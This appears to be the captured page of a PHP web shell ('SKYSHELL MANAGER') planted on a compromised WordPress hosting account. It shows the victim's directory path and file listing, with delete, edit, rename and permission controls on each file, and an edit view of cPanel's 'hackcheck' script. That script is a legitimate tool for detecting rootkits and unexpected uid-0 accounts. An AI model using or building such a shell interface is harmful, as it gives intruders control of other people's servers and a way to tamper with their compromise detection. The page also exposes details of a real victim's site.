📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home4
/
cvysxmmy
/
public_html
/
antenmills-justadd10-com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
3.38 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.nfd-backup
3.38 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.phpupgrader.21100a0f
2.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.phpupgrader.initial
2.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
218594.96 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cli.yml
0.03 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.33 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.81 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: hackcheck
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/hackcheck Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use Cpanel::Rand (); use Cpanel::FileUtils::TouchFile (); use Cpanel::SafeDir::MK (); $| = 1; my $tmpdir = Cpanel::Rand::gettmpdir(); # audit case 46806 ok my $is_hacked = ''; if ( -d $tmpdir ) { foreach my $num ( 0 .. 9 ) { Cpanel::FileUtils::TouchFile::touchfile("$tmpdir/$num"); if ( !-f "$tmpdir/$num" ) { $is_hacked = "Could not create file $tmpdir/$num: $!"; last; } elsif ( !unlink("$tmpdir/$num") ) { $is_hacked = "Could not remove file $tmpdir/$num: $!"; last; } Cpanel::SafeDir::MK::safemkdir("$tmpdir/$num"); if ( !-d "$tmpdir/$num" ) { $is_hacked = "Could not create directory $tmpdir/$num: $!"; last; } elsif ( !rmdir("$tmpdir/$num") ) { $is_hacked = "Could not remove directory $tmpdir/$num: $!"; last; } } if ( !$is_hacked ) { if ( !rmdir($tmpdir) ) { $is_hacked = "Could not remove directory $tmpdir: $!"; } } } else { # Can't make random directory in /tmp $is_hacked = "Failed to create directory $tmpdir: $!"; } my $msg = <<"EOM"; Attempts to create new directories or files whose filenames begin with numbers have failed. This is indicative of a root compromise of the server. The exact error encountered was: $is_hacked EOM if ($is_hacked) { print "[hackcheck] Possible rootkit detected\n$msg"; require Cpanel::Notify; Cpanel::Notify::notification_class( 'class' => 'Check::Hack', 'application' => 'Check::Hack', 'constructor_args' => [ 'origin' => 'hackcheck', 'reason' => $is_hacked ] ); } exit if -e '/etc/disablehackcheck'; foreach my $account (qw(xfs daemon)) { my @pwnam = getpwnam($account); next if !$pwnam[0]; if ( $pwnam[1] !~ m{^[\!\*]} ) { system( "/usr/bin/passwd", "-l", $account ); } } my ( $user, $uid ); open( my $passwd, '<', "/etc/passwd" ); while (<$passwd>) { next if (m/^\#/); ( $user, undef, $uid, undef ) = split( /:/, $_, 3 ); next if ( !defined $uid ); if ( $uid == 0 && $user ne "root" && $user ne "toor" ) { system( '/usr/bin/passwd', '-l', $user ); print "[hackcheck] $user has a uid 0 account (root access).\n"; require Cpanel::Notify; Cpanel::Notify::notification_class( 'class' => 'Check::Hack', 'application' => 'Check::Hack', 'constructor_args' => [ 'origin' => 'hackcheck', 'suspicious_user' => $user ] ); } } close($passwd);
Save